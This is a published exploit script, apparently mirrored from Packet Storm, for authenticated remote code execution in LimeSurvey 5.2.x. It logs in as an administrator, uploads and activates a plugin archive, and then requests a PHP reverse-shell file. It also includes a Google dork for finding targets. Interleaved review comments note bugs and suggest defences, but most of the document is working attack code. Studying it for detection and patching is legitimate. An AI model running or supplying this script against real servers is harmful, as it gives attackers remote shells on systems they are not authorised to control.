## https://sploitus.com/exploit?id=PACKETSTORM:165212
# Exploit Title: LimeSurvey 5.2.4 - Remote Code Execution (RCE) (Authenticated)  
# Google Dork: inurl:limesurvey/index.php/admin/authentication/sa/login  
# Date: 05/12/2021  
# Exploit Author: Y1LD1R1M  
# Vendor Homepage: https://www.limesurvey.org/  
# Software Link: https://download.limesurvey.org/latest-stable-release/limesurvey5.2.4+211129.zip  
# Version: 5.2.x  
# Tested on: Kali Linux 2021.3  
# Reference: https://github.com/Y1LD1R1M-1337/Limesurvey-RCE  
  
#!/usr/bin/python  
# -*- coding: utf-8 -*-  
  
  
import requests  
import sys  
import warnings  
from bs4 import BeautifulSoup  
  
# Silence bs4 UserWarnings so they do not clutter the console output.
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')  
# Banner and usage text. Nothing below validates len(sys.argv), so running
# with fewer than four arguments fails with an IndexError after the banner.
print("_______________LimeSurvey RCE_______________")  
print("")  
print("")  
print("Usage: python exploit.py URL username password port")  
print("Example: python exploit.py http://192.26.26.128 admin password 80")  
print("")  
print("")  
# ASCII-art banner. In this copy of the script the box-drawing characters
# are mojibake (UTF-8 decoded as another code page); the runtime strings are
# left exactly as published.
print("== โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ•— ==")  
print("== โ•šโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ•‘ ==")  
print("== โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ• โ•šโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ•šโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ•šโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ–ˆโ–ˆโ–ˆโ–ˆโ•”โ–ˆโ–ˆโ•‘ ==")  
print("== โ•šโ–ˆโ–ˆโ•”โ• โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘โ•šโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•‘ ==")  
print("== โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ• โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ•šโ•โ• โ–ˆโ–ˆโ•‘ ==")  
print("== โ•šโ•โ• โ•šโ•โ•โ•šโ•โ•โ•โ•โ•โ•โ•โ•šโ•โ•โ•โ•โ•โ• โ•šโ•โ•โ•šโ•โ• โ•šโ•โ• โ•šโ•โ•โ•šโ•โ• โ•šโ•โ• ==")  
print("")  
print("")  
# Positional CLI arguments: base URL, an existing LimeSurvey admin login and
# a port. NOTE(review): `port` is assigned but never used below — only `url`
# reaches the requests, so the port has to be part of the URL itself.
# Every step in this script is an authenticated admin action; valid admin
# credentials are the precondition, which makes credential hygiene and
# strong authentication on the admin login the first line of defence.
url = sys.argv[1]  
username = sys.argv[2]  
password = sys.argv[3]  
port = sys.argv[4]  
  
# One Session so the cookie set at login is replayed on every later request.
req = requests.session()  
print("[+] Retrieving CSRF token...")  
# Fetch the login form and take the value of the FIRST <input> as the Yii
# CSRF token. Neither the HTTP status nor the presence of that element is
# checked: an error page, redirect or layout change raises IndexError here.
loginPage = req.get(url+"/index.php/admin/authentication/sa/login")  
response = loginPage.text  
s = BeautifulSoup(response, 'html.parser')  
CSRF_token = s.findAll('input')[0].get("value")  
print(CSRF_token)  
print("[+] Sending Login Request...")  
  
# Form fields of the admin login POST; "width" is sent as a fixed value.
login_creds = {  
"user": username,  
"password": password,  
"authMethod": "Authdb",  
"loginlang":"default",  
"action":"login",  
"width":"1581",  
"login_submit": "login",  
"YII_CSRF_TOKEN": CSRF_token  
}  
# NOTE(review): printed BEFORE the login POST is sent (see the req.post a
# few lines down) and the login response is never inspected, so this message
# says nothing about whether authentication actually succeeded.
print("[+]Login Successful")  
print("")  
print("[+] Upload Plugin Request...")  
print("[+] Retrieving CSRF token...")  
# Local plugin archive, opened from a hard-coded absolute path and passed to
# requests as a multipart file below. The handle is never closed.
filehandle = open("/root/limesurvey/plugin/Y1LD1R1M.zip",mode = "rb") # CHANGE THIS  
# The actual login POST. Its result is not checked; if it failed, the later
# admin requests would just return the login page and the
# `findAll('input')[0]` lookups would quietly pick up unrelated fields.
login = req.post(url+"/index.php/admin/authentication/sa/login" ,data=login_creds)  
# Plugin-manager index page, fetched only to read a fresh CSRF token.
UploadPage = req.get(url+"/index.php/admin/pluginmanager/sa/index")  
response = UploadPage.text  
s = BeautifulSoup(response, 'html.parser')  
CSRF_token2 = s.findAll('input')[0].get("value")  
print(CSRF_token2)  
# "lid" is the literal string "$lid" — presumably an unexpanded placeholder
# copied from a captured browser request; it is sent verbatim.
Upload_creds = {  
"YII_CSRF_TOKEN":CSRF_token2,  
"lid":"$lid",  
"action": "templateupload"  
}  
# The remaining steps drive the regular admin plugin-manager workflow
# (upload -> uploadConfirm -> installUploadedPlugin -> activate) with the
# session cookie. Server-side this shows up as a short burst of
# authenticated requests to /index.php/admin/pluginmanager with those `sa`
# values, followed by a GET under /upload/plugins/ — an access-log sequence
# worth alerting on wherever plugin uploads are not expected admin activity.
# None of the POST responses is inspected; every "Successfully" line below
# is printed unconditionally.
file_upload= req.post(url+"/index.php/admin/pluginmanager?sa=upload",files = {'the_file':filehandle},data=Upload_creds)  
UploadPage = req.get(url+"/index.php/admin/pluginmanager?sa=uploadConfirm")  
response = UploadPage.text  
print("[+] Plugin Uploaded Successfully")  
print("")  
print("[+] Install Plugin Request...")  
print("[+] Retrieving CSRF token...")  
  
# Install page, again read only for its CSRF token before the POST.
InstallPage = req.get(url+"/index.php/admin/pluginmanager?sa=installUploadedPlugin")  
response = InstallPage.text  
s = BeautifulSoup(response, 'html.parser')  
CSRF_token3 = s.findAll('input')[0].get("value")  
print(CSRF_token3)  
Install_creds = {  
"YII_CSRF_TOKEN":CSRF_token3,  
"isUpdate": "false"  
}  
file_install= req.post(url+"/index.php/admin/pluginmanager?sa=installUploadedPlugin",data=Install_creds)  
print("[+] Plugin Installed Successfully")  
print("")  
print("[+] Activate Plugin Request...")  
print("[+] Retrieving CSRF token...")  
ActivatePage = req.get(url+"/index.php/admin/pluginmanager?sa=activate")  
response = ActivatePage.text  
s = BeautifulSoup(response, 'html.parser')  
CSRF_token4 = s.findAll('input')[0].get("value")  
print(CSRF_token4)  
# The plugin id is hard-coded to "1"; the script does not look it up from
# the install response, hence the CHANGE THIS marker.
Activate_creds = {  
"YII_CSRF_TOKEN":CSRF_token4,  
"pluginId": "1" # CHANGE THIS  
}  
file_activate= req.post(url+"/index.php/admin/pluginmanager?sa=activate",data=Activate_creds)   
print("[+] Plugin Activated Successfully")  
print("")  
print("[+] Reverse Shell Starting, Check Your Connection :)")  
# Final step is a single GET to a PHP file inside the uploaded plugin's
# directory under /upload/plugins/; the response is discarded. The defensive
# counterpart is to keep server-side script execution disabled under the
# upload directory and to limit plugin uploads to trusted administrators.
shell= req.get(url+"/upload/plugins/Y1LD1R1M/php-rev.php") # CHANGE THIS